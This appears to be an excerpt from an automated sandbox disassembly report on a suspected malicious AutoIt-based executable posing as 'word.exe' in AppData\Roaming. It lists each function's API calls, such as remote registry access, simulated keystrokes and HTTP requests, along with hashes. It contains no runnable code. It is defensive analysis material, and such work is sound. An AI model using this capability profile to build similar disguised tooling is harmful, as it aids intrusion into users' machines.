                                                                            • String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                            • API String ID: 665237470-60002521
                                                                            • Opcode ID: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                            • Instruction ID: 799f1794578ead7d01377608c22e1fb401aa4fc5ffca8a64c02b8280356d09a3
                                                                            • Opcode Fuzzy Hash: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                            • Instruction Fuzzy Hash: 6091B272204341AFD720DF64D880EABB7E9EFC4314F50891EF28987291D7B9AD45C766
                                                                            APIs
                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00440B7B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsSystem
                                                                            • String ID: X+
                                                                            • API String ID: 4116985748-1938338529
                                                                            • Opcode ID: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                            • Instruction ID: 1e23dbab6d9439f1299be2c39bdf7de0481ead398f869a6d5eaf0ea33fa99bdf
                                                                            • Opcode Fuzzy Hash: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                            • Instruction Fuzzy Hash: 8EA19C70608701DBE314CF68C984B6BBBE1FB88704F14491EFA8593251E778F965CB5A
                                                                            APIs
                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                            • _memset.LIBCMT ref: 004538C4
                                                                            • GetMenuItemInfoW.USER32 ref: 004538EF
                                                                            • _wcslen.LIBCMT ref: 00453960
                                                                            • SetMenuItemInfoW.USER32 ref: 004539C4
                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 004539E0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info_wcslen$Default_memset_wcscpy
                                                                            • String ID: 0$p+$p+
                                                                            • API String ID: 3530711334-3829631072
                                                                            • Opcode ID: f8b7da67bd46f6d3acaa256ed113b1c9c09b209eebf999d73fbf05c6f83275f6
                                                                            • Instruction ID: 97d09e0af2b4d046480d7fb626e7fa0667c22e7462995616ff61acde959b3bac
                                                                            • Opcode Fuzzy Hash: f8b7da67bd46f6d3acaa256ed113b1c9c09b209eebf999d73fbf05c6f83275f6
                                                                            • Instruction Fuzzy Hash: 747118F15083015AD714DF65C881B6BB7E4EB98396F04491FFD8082292D7BCDA4CC7AA
                                                                            APIs
                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ConnectRegistry_wcslen
                                                                            • String ID: HH
                                                                            • API String ID: 535477410-2761332787
                                                                            • Opcode ID: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                            • Instruction ID: 68d8ff7817732ac0dd8275009c421e29eb5870de2046e22f9b94a35ba54c9d9f
                                                                            • Opcode Fuzzy Hash: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                            • Instruction Fuzzy Hash: FE617FB56083009FD304EF65C981F6BB7E4AF88704F14891EF681A7291D678ED09CB97
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: X+
                                                                            • API String ID: 0-1938338529
                                                                            • Opcode ID: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                            • Instruction ID: b3b3da583a0ae8cfa3180eda0e634cae40a493ebdfd517dbec9d2fd4fbd82cb1
                                                                            • Opcode Fuzzy Hash: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                            • Instruction Fuzzy Hash: 1E513A315082909FE321CF14DC89FABBB64FB46320F18456FF895AB2D1D7649C06D7AA
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                            • String ID: 0$2
                                                                            • API String ID: 3311875123-3793063076
                                                                            • Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                            • Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
                                                                            • Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                            • Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67
                                                                            APIs
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
                                                                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
                                                                            • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                            • ShowWindow.USER32(004A83D8,00000000), ref: 00448C37
                                                                            • ShowWindow.USER32(004A83D8,00000004), ref: 00448C43
                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Enable$Show$MessageMoveSend
                                                                            • String ID: X+
                                                                            • API String ID: 896007046-1938338529
                                                                            • Opcode ID: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                            • Instruction ID: 0809a8548e22334437b8974569d6adfa08582830463fbdb99c3481629354d751
                                                                            • Opcode Fuzzy Hash: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                            • Instruction Fuzzy Hash: 63419E746043419FF7248B24C884B6FB7A1FB99305F18886EF98197391DA78A845CB59
                                                                            APIs
                                                                            • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                            • SendMessageW.USER32(002BE158,000000F1,00000000,00000000), ref: 004414C6
                                                                            • SendMessageW.USER32(002BE158,000000F1,00000001,00000000), ref: 004414F1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$LongWindow
                                                                            • String ID: X+
                                                                            • API String ID: 312131281-1938338529
                                                                            • Opcode ID: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                            • Instruction ID: f6a862a32ccfd92e4f153a1965fa7dc80102ffdb8abe4b8a046001f82176c48d
                                                                            • Opcode Fuzzy Hash: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                            • Instruction Fuzzy Hash: 2F416A347442019FE720CF58DCC4F6A77A5FB8A754F24416AE5519B3B1CB75AC82CB48
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\AppData\Roaming\word.exe), ref: 0043719E
                                                                            • LoadStringW.USER32(00000000), ref: 004371A7
                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
                                                                            • LoadStringW.USER32(00000000), ref: 004371C0
                                                                            • _printf.LIBCMT ref: 004371EC
                                                                            • MessageBoxW.USER32 ref: 00437208
                                                                            Strings
                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 004371E7
                                                                            • C:\Users\user\AppData\Roaming\word.exe, xrefs: 00437189
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString$Message_printf
                                                                            • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\AppData\Roaming\word.exe
                                                                            • API String ID: 220974073-1105308645
                                                                            • Opcode ID: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                            • Instruction ID: cc9e6972dbc5209964c20f0f7d1f7455a13934f6c555fd98bc0bf92a0502fb90
                                                                            • Opcode Fuzzy Hash: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                            • Instruction Fuzzy Hash: F7014FB2A543447AE620EB549D06FFB365CABC4B01F444C1EB794A60C0AAF865548BBA
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                            • Instruction ID: 20732dcab93056f759d0b04a6df1a57780e33876730225f1fefd21ccf2a16f59
                                                                            • Opcode Fuzzy Hash: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                            • Instruction Fuzzy Hash: 36519070200301ABD320DF29CC85F5BB7E8EB48715F540A1EF995E7292D7B4E949CB29
                                                                            APIs
                                                                              • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Roaming\word.exe,?,C:\Users\user\AppData\Roaming\word.exe,004A8E80,C:\Users\user\AppData\Roaming\word.exe,0040F3D2), ref: 0040FFCA
                                                                              • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0045355E
                                                                            • MoveFileW.KERNEL32 ref: 0045358E
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 978794511-0
                                                                            • Opcode ID: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                            • Instruction ID: dcad70f49e32ae1adaf0c812d378eb0bba467e0a617048934f4a65f03e3a0b24
                                                                            • Opcode Fuzzy Hash: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                            • Instruction Fuzzy Hash: 665162B25043406AC724EF61D885ADFB3E8AFC8305F44992EB94992151E73DD34DC767
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                            • Instruction ID: b1e2397247e50d0c7000acf5a2db8631a214b417b603bec0598d849dd48054e0
                                                                            • Opcode Fuzzy Hash: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                            • Instruction Fuzzy Hash: E54128332402806BE320A75DB8C4ABBFB98E7A2362F50443FF18196520D76678C5D339
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00455F01
                                                                            • _memset.LIBCMT ref: 00455F12
                                                                            • SendMessageW.USER32 ref: 00455F43
                                                                            • SendMessageW.USER32(?,0000104B,00000000,?), ref: 00455F82
                                                                            • SendMessageW.USER32(?,0000104B,00000000,00000001), ref: 00455FF5
                                                                            • _wcslen.LIBCMT ref: 00455FFC
                                                                            • _wcslen.LIBCMT ref: 00456018
                                                                            • CharNextW.USER32(00000000), ref: 00456034
                                                                            • SendMessageW.USER32(?,0000104B,00000000,00000001), ref: 00456060
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$_wcslen$CharLongNextWindow_memset
                                                                            • String ID:
                                                                            • API String ID: 2321321212-0
                                                                            • Opcode ID: 56a67735f7a5bb8cc0a1c357c9749c25dc37e6f8b8df9cef775033d7e934ef4e
                                                                            • Instruction ID: 728fd5b54b682decfcd50b06f9b7fb359c8698431e162ed45c662fcf507213b6
                                                                            • Opcode Fuzzy Hash: 56a67735f7a5bb8cc0a1c357c9749c25dc37e6f8b8df9cef775033d7e934ef4e
                                                                            • Instruction Fuzzy Hash: 5D41D172204241ABE3108F68DC45BABB7E4FB84321F004A2EF954D72D1E7B9904A8B66
                                                                            APIs
                                                                              • Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
                                                                              • Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32(00000000,?,00000001,00478FA7), ref: 00445964
                                                                              • Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001), ref: 0044596B
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
                                                                            • PostMessageW.USER32 ref: 00445D35
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
                                                                            • PostMessageW.USER32 ref: 00445D66
                                                                            • Sleep.KERNEL32(00000000), ref: 00445D70
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
                                                                            • PostMessageW.USER32 ref: 00445D8B
                                                                            • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                            • String ID:
                                                                            • API String ID: 2014098862-0
                                                                            • Opcode ID: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                            • Instruction ID: b085f3065cf9cd100f04f322da00d4b037e108fc79bf5967fdabce1cd6d2e74b
                                                                            • Opcode Fuzzy Hash: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                            • Instruction Fuzzy Hash: 7B116971790704B7F620AB958C8AF5A7399EF88B11F20080DF790AB1C1C9F5E4418B7C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: X+
                                                                            • API String ID: 0-1938338529
                                                                            • Opcode ID: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                            • Instruction ID: be39947db1ffbcb7075193c31d102fc15fe4f6af8d23ce90efbce3d2b6a77a88
                                                                            • Opcode Fuzzy Hash: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                            • Instruction Fuzzy Hash: 4BF16D71108740AFD210DB59C880EABB7F9EFCA744F10891EF69983261D735AC45CBAA
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc_malloc$_strcat_strlen
                                                                            • String ID: AU3_FreeVar
                                                                            • API String ID: 2184576858-771828931
                                                                            • Opcode ID: 111e65442873bd7cbffe48700b84114c079de58427b558a04ef4a5d95244f0f0
                                                                            • Instruction ID: c940ad03d776ce5ee908f8b881b33357b51647545ffc53e819ca791e1fdac2da
                                                                            • Opcode Fuzzy Hash: 111e65442873bd7cbffe48700b84114c079de58427b558a04ef4a5d95244f0f0
                                                                            • Instruction Fuzzy Hash: EDA18DB5604205DFC300DF59C480A2AB7E5FFC8319F1489AEE9554B362D739ED89CB8A
                                                                            APIs
                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
                                                                            • DestroyWindow.USER32 ref: 0042A751
                                                                            • UnregisterHotKey.USER32(?), ref: 0042A778
                                                                            • FreeLibrary.KERNEL32(?), ref: 0042A822
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                            • String ID: close all
                                                                            • API String ID: 4174999648-3243417748
                                                                            • Opcode ID: ddf39f1eda455a1c63d5a7d3271f56cd3ed42d138f3b783cbb3ca1597947a384
                                                                            • Instruction ID: e23b5dd52123a376b0379481fe8be5d2f02d07e70979f80a1c72d587d5a24a2c
                                                                            • Opcode Fuzzy Hash: ddf39f1eda455a1c63d5a7d3271f56cd3ed42d138f3b783cbb3ca1597947a384
                                                                            • Instruction Fuzzy Hash: FFA17075A102248FCB20EF55CC85B9AB3B8BF44304F5044EEE90967291D779AE85CF9D
                                                                            APIs
                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
                                                                            • InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
                                                                              • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                            • String ID:
                                                                            • API String ID: 1291720006-3916222277
